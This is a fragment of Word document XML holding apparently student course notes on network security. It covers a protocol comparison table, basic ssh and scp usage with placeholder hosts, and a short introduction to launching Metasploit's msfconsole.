            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AA74D6A" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="00AC2210"/>
          <w:p w14:paraId="48A270A1" w14:textId="40DE8C3A" w:rsidR="004E4F8D" w:rsidRDefault="00FE151C" w:rsidP="00FE151C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE151C">
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2512DAC4" w14:textId="77777777" w:rsidR="00FE151C" w:rsidRDefault="00FE151C" w:rsidP="00AC2210"/>
          <w:p w14:paraId="1AC79EA4" w14:textId="5A23A8E2" w:rsidR="004E4F8D" w:rsidRDefault="00FE151C" w:rsidP="00AC2210">
            <w:r w:rsidRPr="00FE151C">
              <w:t>No authentication mechanism.</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE151C">
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="698942F4" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="00FE151C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="771DBE5C" w14:textId="6CDB9BD6" w:rsidR="00FE151C" w:rsidRDefault="00FE151C" w:rsidP="00FE151C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE151C">
              <w:t>Uses public key encryption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E4F8D" w14:paraId="7402228E" w14:textId="77777777" w:rsidTr="00C85B2C">
        <w:trPr>
          <w:trHeight w:val="1233"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69C3F7BA" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="00AC2210"/>
          <w:p w14:paraId="29E04FB0" w14:textId="5948B69B" w:rsidR="00FE151C" w:rsidRDefault="00FE151C" w:rsidP="00FE151C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE151C">
              <w:t>Data Formats</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE151C">
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F95F259" w14:textId="77777777" w:rsidR="00FE151C" w:rsidRDefault="00FE151C" w:rsidP="00FE151C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6857E269" w14:textId="4FA2474B" w:rsidR="004E4F8D" w:rsidRDefault="00FE151C" w:rsidP="00FE151C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE151C">
              <w:t>Data is transferred as plain text.</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE151C">
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D5DCB96" w14:textId="55924B19" w:rsidR="00FE151C" w:rsidRDefault="00FE151C" w:rsidP="00AC2210"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C769CC5" w14:textId="77777777" w:rsidR="00C85B2C" w:rsidRDefault="00C85B2C" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3257F942" w14:textId="07C0D9F7" w:rsidR="00C85B2C" w:rsidRDefault="00C85B2C" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C85B2C">
              <w:t>Data is transferred in an encrypted format via a secure channel.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E4F8D" w14:paraId="6321BD25" w14:textId="77777777" w:rsidTr="004E4F8D">
        <w:trPr>
          <w:trHeight w:val="760"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4547F64D" w14:textId="77777777" w:rsidR="00C85B2C" w:rsidRDefault="00C85B2C" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10F489AA" w14:textId="756881C9" w:rsidR="00C85B2C" w:rsidRDefault="00C85B2C" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C85B2C">
              <w:t>Operating Systems</w:t>
            </w:r>
            <w:r w:rsidRPr="00C85B2C">
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18C5AB48" w14:textId="77777777" w:rsidR="00C85B2C" w:rsidRDefault="00C85B2C" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1051FDC7" w14:textId="7248B6A1" w:rsidR="004E4F8D" w:rsidRDefault="00C85B2C" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C85B2C">
              <w:t>Linux and Windows.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CCAAA35" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3481658E" w14:textId="63A8A94D" w:rsidR="00C85B2C" w:rsidRDefault="00C85B2C" w:rsidP="00AC2210">
            <w:r w:rsidRPr="00C85B2C">
              <w:t>All popular operating systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E4F8D" w14:paraId="0C4C07E5" w14:textId="77777777" w:rsidTr="004E4F8D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E221744" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20621600" w14:textId="4BF751BC" w:rsidR="00C85B2C" w:rsidRDefault="00C85B2C" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C85B2C">
              <w:t>Bandwidth Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C65858A" w14:textId="77777777" w:rsidR="004E4F8D" w:rsidRDefault="004E4F8D" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DF2C481" w14:textId="00507C33" w:rsidR="00C85B2C" w:rsidRDefault="00C85B2C" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B0BED7" w14:textId="77777777" w:rsidR="00C85B2C" w:rsidRDefault="00C85B2C" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15698625" w14:textId="012AF975" w:rsidR="004E4F8D" w:rsidRDefault="00C85B2C" w:rsidP="00C85B2C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FDD2F23" w14:textId="2707BE8B" w:rsidR="00AC2210" w:rsidRPr="00AC2210" w:rsidRDefault="00AC2210" w:rsidP="00AC2210">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39F5E3" w14:textId="599ADBDB" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="24F14AF5" w14:textId="7D74740E" w:rsidR="00D56067" w:rsidRDefault="00035369" w:rsidP="00B83FB4">
      <w:r>
        <w:t>Let us try SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779548F9" w14:textId="7F6C5EB1" w:rsidR="00035369" w:rsidRDefault="00035369" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06AA15C6" wp14:editId="72173580">
            <wp:extent cx="3784600" cy="67564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675640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C1ECC" w14:textId="47764C67" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="205DF286" w14:textId="3F6DC6D2" w:rsidR="00D56067" w:rsidRDefault="00035369" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">You notice that the terminal now is controlling the local </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>machine</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which is Kali, I can type </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71712A65" w14:textId="7A1FC851" w:rsidR="00035369" w:rsidRDefault="00035369" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00035369">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sh username@ip_machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3054CFD3" w14:textId="1B585D98" w:rsidR="00035369" w:rsidRDefault="00035369" w:rsidP="00B83FB4">
      <w:r>
        <w:t>to get access to that machine remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B596D" w14:textId="565A7F41" w:rsidR="00035369" w:rsidRDefault="00035369" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">It’s going to ask me about the password of the remote machine, if the password is correct, now I have full access to that machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0C1F1" w14:textId="7A961EEE" w:rsidR="00035369" w:rsidRDefault="00035369" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D15544D" wp14:editId="593FAB29">
            <wp:extent cx="3689350" cy="8191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350" cy="819150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BC7E58" w14:textId="2847B9C8" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="62AEEFE4" w14:textId="714B946B" w:rsidR="00D56067" w:rsidRDefault="00035369" w:rsidP="00B83FB4">
      <w:r>
        <w:t>As you can see, now I am connected to the server from a Kali desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B89CD85" w14:textId="709E62DF" w:rsidR="000B48E6" w:rsidRDefault="000B48E6" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0743F316" w14:textId="4EB182DA" w:rsidR="000B48E6" w:rsidRDefault="000B48E6" w:rsidP="000B48E6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Secure Copy Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5C63B" w14:textId="47DA1866" w:rsidR="000B48E6" w:rsidRDefault="000B48E6" w:rsidP="000B48E6">
      <w:r>
        <w:t>We can transfer files from the remote machine by typing this command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E6CC6F" w14:textId="7CB106BC" w:rsidR="000B48E6" w:rsidRDefault="000B48E6" w:rsidP="000B48E6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>mark@MACHINE_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>:/home/mark/archive.tar.gz ~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5C5794" w14:textId="1913DB70" w:rsidR="000B48E6" w:rsidRDefault="000B48E6" w:rsidP="000B48E6">
      <w:r>
        <w:t xml:space="preserve">This command will copy the file </w:t>
      </w:r>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>archive.tar.gz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the remote system located in </w:t>
      </w:r>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/mark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D60ED6" w14:textId="12175404" w:rsidR="000B48E6" w:rsidRDefault="000B48E6" w:rsidP="000B48E6">
      <w:r>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FEE89C" w14:textId="052E6345" w:rsidR="000B48E6" w:rsidRDefault="000B48E6" w:rsidP="000B48E6"/>
    <w:p w14:paraId="5FA30330" w14:textId="6ABD3014" w:rsidR="000B48E6" w:rsidRDefault="000B48E6" w:rsidP="000B48E6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> backup.tar.bz2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>mark@MACHINE_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>:/home/mark/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EA63DA" w14:textId="66010A0A" w:rsidR="000B48E6" w:rsidRPr="000B48E6" w:rsidRDefault="000B48E6" w:rsidP="000B48E6">
      <w:r>
        <w:t xml:space="preserve">This command will copy </w:t>
      </w:r>
      <w:r w:rsidRPr="000B48E6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>backup.tar.bz2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the local system to the directory </w:t>
      </w:r>
      <w:r w:rsidR="00D537C6" w:rsidRPr="00D537C6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/mark/</w:t>
      </w:r>
      <w:r w:rsidR="00D537C6">
        <w:t xml:space="preserve"> on the remote system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE6E707" w14:textId="1439E95D" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="45B73E29" w14:textId="21D88F27" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0BF87FFF" w14:textId="73B32C0F" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="3BAE3B34" w14:textId="26220831" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="02A11287" w14:textId="78506688" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="3F7A7707" w14:textId="58352F9E" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0B70A5B4" w14:textId="7B91B40B" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="1FB4F90B" w14:textId="7CC2D5F6" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="59973CB2" w14:textId="1A005C19" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="1AD9DFFC" w14:textId="3372832A" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="4B1EBA13" w14:textId="74D5403E" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="340E8675" w14:textId="2C48FAC4" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="06C8F6E4" w14:textId="66B43974" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="2B0D12EC" w14:textId="2F9BC446" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="05C5716C" w14:textId="029CF45C" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="5A5722C5" w14:textId="5BDDC5FF" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="20772900" w14:textId="2C56DCF4" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="009D6DD5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E3F75" w14:textId="652185EA" w:rsidR="00D56067" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4">
      <w:r>
        <w:t>Metasploit is an exploitation framework. It can be accessed using this CLI command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B5AA4" w14:textId="1AD23962" w:rsidR="009D6DD5" w:rsidRDefault="009D6DD5" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="009D6DD5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E08E00" w14:textId="5504E661" w:rsidR="009D6DD5" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4">
      <w:r>
        <w:t>msfconsole supports most Linux commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3806F07B" w14:textId="76DB49B2" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="007A50F3" wp14:editId="6B8F6324">
            <wp:extent cx="5725160" cy="332359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5E44734C" w14:textId="03080281" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="6554C4CF" w14:textId="0ACBEE3B" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">Msfconsole also supports tab completion. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D81B93" w14:textId="3AA6CE4A" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="2C44C5F9" w14:textId="656BBA2C" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="70D20638" w14:textId="44458330" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="39C69132" w14:textId="11BCECF4" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="17DB128D" w14:textId="4A6370C1" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="63E98B88" w14:textId="119ABE12" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="787A6DF6" w14:textId="0BD963C4" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="2DD5112C" w14:textId="62009CF3" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="4C91F98F" w14:textId="171FB047" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="35BA58A7" w14:textId="48E7D5BC" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="00FF69B0" w14:textId="618636FD" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="74F86EA3" w14:textId="79B949A3" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="544AFE1B" w14:textId="5C033071" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="016648B4" w14:textId="4BFFD936" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="313CD2D2" w14:textId="05709E4E" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="4C75CBE9" w14:textId="5E1C7E9D" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="06322621" w14:textId="4CED7257" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="4C484FD7" w14:textId="0D2BDBF3" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="66A1C1E1" w14:textId="6697D550" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="69DF5293" w14:textId="376FBC8D" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="54A13D52" w14:textId="48BA534C" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="2F1A62A7" w14:textId="2247648E" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="27E964CB" w14:textId="3FCC84FB" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="241664BB" w14:textId="0A2321B8" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="00D143C6" w14:textId="7721B1AF" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="62AA6D9A" w14:textId="3F3B8908" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="6A04DACF" w14:textId="77777777" w:rsidR="003A7FDF" w:rsidRDefault="003A7FDF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="77973B0B" w14:textId="7FC11412" w:rsidR="00D56067" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="2D2BF924" w14:textId="77777777" w:rsidR="00D56067" w:rsidRPr="00B83FB4" w:rsidRDefault="00D56067" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="79CBD663" w14:textId="77777777" w:rsidR="00A40D93" w:rsidRPr="00BD0697" w:rsidRDefault="00A40D93" w:rsidP="00BD0697"/>
    <w:p w14:paraId="08BD9A75" w14:textId="77777777" w:rsidR="00412D22" w:rsidRPr="009A5302" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="16127471" w14:textId="4268BC34" w:rsidR="009903D8" w:rsidRPr="00A73FE2" w:rsidRDefault="009903D8" w:rsidP="009903D8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc114777215"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(BOK) Network Security (week 5-8)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="5D09D2D0" w14:textId="77FD609C" w:rsidR="009903D8" w:rsidRDefault="009903D8" w:rsidP="009903D8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc114777216"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(BOK) Security Concepts (week 9-10)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="4E702B5F" w14:textId="403CA82A" w:rsidR="004A39E9" w:rsidRDefault="004A39E9" w:rsidP="004A39E9"/>
    <w:p w14:paraId="720C2620" w14:textId="571F95C8" w:rsidR="004A39E9" w:rsidRDefault="004A39E9" w:rsidP="004A39E9"/>
    <w:p w14:paraId="71C1F2BE" w14:textId="388A621A" w:rsidR="004A39E9" w:rsidRDefault="004A39E9" w:rsidP="004A39E9"/>
    <w:p w14:paraId="2FE25BAF" w14:textId="19E4130E" w:rsidR="004A39E9" w:rsidRDefault="004A39E9" w:rsidP="004A39E9"/>
    <w:p w14:paraId="5DBBC8B1" w14:textId="080F0885" w:rsidR="004A39E9" w:rsidRDefault="004A39E9" w:rsidP="004A39E9"/>
    <w:p w14:paraId="43C67E1A" w14:textId="30E09698" w:rsidR="004A39E9" w:rsidRDefault="004A39E9" w:rsidP="004A39E9"/>
